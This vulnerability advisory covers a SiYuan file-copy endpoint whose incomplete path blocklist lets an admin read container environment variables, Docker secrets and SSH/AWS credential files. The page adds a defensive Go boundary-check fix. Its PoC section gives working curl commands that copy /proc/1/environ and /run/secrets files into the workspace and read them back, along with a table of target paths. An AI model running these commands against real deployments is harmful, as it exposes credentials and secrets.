CVE-2026-32747

Severity: MEDIUM (CVSS 3.1 base score 6.8)
Published: 2026-03-16
Project: https://github.com/siyuan-note/siyuan
Advisory: GHSA-h5vh-m7fg-w5h6

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: High
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: None
Availability: None

Lifecycle Timeline

Analysis Generated: Mar 16, 2026 - 20:05 (vuln.today)
CVE Published: Mar 16, 2026 - 18:46 (nvd)

Description

### Summary

`POST /api/file/globalCopyFiles` reads source files using `filepath.Abs()` with no workspace boundary check, relying solely on `util.IsSensitivePath()`, whose blocklist omits `/proc/`, `/run/secrets/`, and home directory dotfiles. An admin can copy `/proc/1/environ` or Docker secrets into the workspace and read them via the standard file API.

### Details

**File:** `kernel/api/file.go` - function `globalCopyFiles`

```go
for i, src := range srcs {
    absSrc, _ := filepath.Abs(src) // not restricted to workspace
    if util.IsSensitivePath(absSrc) { // blocklist is incomplete
        return
    }
    srcs[i] = absSrc
}
destDir := filepath.Join(util.WorkspaceDir, destDir)
for _, src := range srcs {
    dest := filepath.Join(destDir, filepath.Base(src))
    filelock.Copy(src, dest) // copies unchecked sensitive file into workspace
}
```

**`IsSensitivePath` blocklist** (`kernel/util/path.go`):

```go
prefixes := []string{"/etc/ssh", "/root", "/etc", "/var/lib/", "/."}
```

**Not blocked - exploitable targets:**

| Path | Contains |
|------|----------|
| `/proc/1/environ` | All env vars: `DATABASE_URL`, `AWS_ACCESS_KEY_ID`, `ANTHROPIC_API_KEY` |
| `/run/secrets/*` | Docker Swarm / Compose injected secrets |
| `/home/siyuan/.aws/credentials` | AWS credentials (non-root user) |
| `/home/siyuan/.ssh/id_rsa` | SSH private key (non-root user) |
| `/tmp/` | Temporary files including tokens |

### PoC

**Environment:**

```bash
docker run -d --name siyuan -p 6806:6806 \
  -v $(pwd)/workspace:/siyuan/workspace \
  b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
```

**Exploit:**

```bash
TOKEN="YOUR_ADMIN_TOKEN"

# Step 1: Copy /proc/1/environ (process env vars) into workspace assets
curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"srcs":["/proc/1/environ"],"destDir":"data/assets/"}'

# Step 2: Read the copied file via standard API
curl -s -X POST http://localhost:6806/api/file/getFile \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"path":"/data/assets/environ"}' | tr '\0' '\n'
# Output: HOSTNAME=abc\nPATH=/usr/local/sbin:...\nDATABASE_URL=postgres://...\nAPI_KEY=sk-...
```

**Docker secrets:**

```bash
# Copy all Docker-injected secrets
curl -s -X POST http://localhost:6806/api/file/globalCopyFiles \
  -H "Authorization: Token $TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"srcs":["/run/secrets/db_password","/run/secrets/api_token"],"destDir":"data/assets/"}'
```

### Impact

An admin can exfiltrate any file readable by the SiYuan process that falls outside the incomplete blocklist. In containerized deployments this includes all injected secrets and environment variables - a common pattern for passing credentials to containers. The exfiltrated files are then accessible via the standard workspace file API and persist until manually deleted.
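The root cause described in the Details section is a blocklist that has to name every sensitive location on the host. The defensive alternative is a boundary check: resolve each source path and accept it only if it stays inside the workspace, so `/proc/`, `/run/secrets/` and dotfiles are rejected without being enumerated. The Go below is an added example written for this page; it is not SiYuan's code or a patch from the project. `resolveWithinWorkspace`, `validateCopySources` and the sample paths are hypothetical, and the workspace path is borrowed from the advisory's Docker example.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideWorkspace is returned for any source path that does not resolve
// to the workspace directory or one of its descendants.
var ErrOutsideWorkspace = errors.New("source path resolves outside the workspace")

// resolveWithinWorkspace is a hypothetical boundary check added for
// illustration (not SiYuan's code). Relative paths are resolved against the
// workspace rather than the process working directory, the result is made
// absolute and cleaned (collapsing "." and ".."), and it is accepted only if
// it is workspaceDir itself or lies below it.
func resolveWithinWorkspace(workspaceDir, src string) (string, error) {
	absWorkspace, err := filepath.Abs(workspaceDir)
	if err != nil {
		return "", err
	}
	if !filepath.IsAbs(src) {
		src = filepath.Join(absWorkspace, src)
	}
	absSrc, err := filepath.Abs(src)
	if err != nil {
		return "", err
	}
	// Rel yields a path starting with ".." exactly when absSrc is not under
	// absWorkspace. Requiring the separator after ".." keeps a sibling such as
	// "/siyuan/workspace2" from slipping through on a bare prefix match.
	rel, err := filepath.Rel(absWorkspace, absSrc)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideWorkspace
	}
	return absSrc, nil
}

// validateCopySources applies the check to a whole request and fails closed:
// one rejected source rejects the request, so nothing is partially copied.
func validateCopySources(workspaceDir string, srcs []string) ([]string, error) {
	resolved := make([]string, 0, len(srcs))
	for _, src := range srcs {
		abs, err := resolveWithinWorkspace(workspaceDir, src)
		if err != nil {
			return nil, fmt.Errorf("reject %q: %w", src, err)
		}
		resolved = append(resolved, abs)
	}
	return resolved, nil
}

func main() {
	// Constructed sample inputs: the workspace from the advisory's Docker
	// example, plus in-bounds and out-of-bounds sources.
	const workspace = "/siyuan/workspace"
	for _, src := range []string{
		"/siyuan/workspace/data/assets/note.png",
		"data/assets/note.png",
		"/proc/1/environ",
		"/run/secrets/db_password",
		"data/../../etc/passwd",
		"/siyuan/workspace2/leak",
	} {
		abs, err := resolveWithinWorkspace(workspace, src)
		if err != nil {
			fmt.Printf("%-40s -> rejected (%v)\n", src, err)
			continue
		}
		fmt.Printf("%-40s -> allowed as %s\n", src, abs)
	}
}
```

The check is purely lexical: a symlink inside the workspace that points at `/proc/1/environ` would pass it. On paths that exist, resolve them with `filepath.EvalSymlinks` before calling `resolveWithinWorkspace`, or open the file in a way that refuses to follow links, so the containment decision is made on the real target. Logging each `ErrOutsideWorkspace` rejection together with the requesting account gives an audit trail for attempts to read host files through the copy endpoint.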

Analysis

Administrative users of Docker and PostgreSQL deployments can exploit incomplete path validation in the `POST /api/file/globalCopyFiles` endpoint to copy sensitive files, such as container environment variables and Docker secrets, from restricted locations (`/proc/`, `/run/secrets/`) into the workspace, where they become readable via standard file APIs. The vulnerability stems from reliance on blocklist-based validation that fails to cover these critical system paths. …

Remediation

Within 30 days: Identify affected systems and apply vendor patches as part of regular patch cycle. Review file handling controls.

Priority Score

Score: 34 (scale: Low / Medium / High / Critical)
KEV: 0
EPSS: +0.0
CVSS: +34
POC: 0
